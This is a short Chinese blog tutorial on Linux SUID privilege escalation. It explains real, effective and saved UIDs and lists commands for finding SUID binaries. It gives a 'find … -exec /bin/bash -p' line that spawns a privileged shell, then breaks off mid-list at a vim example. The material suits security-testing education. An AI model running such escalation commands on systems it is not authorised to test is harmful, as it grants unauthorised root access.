SUID提权利用

于 2025-02-13 22:56:08 发布
阅读量226 收藏
点赞数 1
文章标签: 安全性测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/code_father1/article/details/145622247
版权

SUID提权

利用文件的Set User ID,当文件杯设置了SUID位,即使执行该文件的用户不是文件的拥有者,该用户也会在执行时临时获得文件拥有者的权限。

每个进程运行通常有会有三个与用户身份相关的UID

  • Real Uid:启动这个进程的真实用户。
  • effective UID: 决定进程实际运行时的权限,有效身份ID是进程当前以哪个用户身份运行,决定了它能访问哪些文件和资源。
  • save set-user-id: 保存一个进程的原始有效用户ID,以便稍后可以恢复。当进程发生特权切换,可以用保存的用户ID来恢复到之前的有效用户id。
# 查看命令运行时的有效id
ps -eo pid,uid,euid,cmd

# 查看具有suid标志的文件
find / -perm -u=s -type f 2>/dev/null

常见可以使用提权的命令

# find
find / -exec "/bin/bash" -p \
# vim
code_father1
关注
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值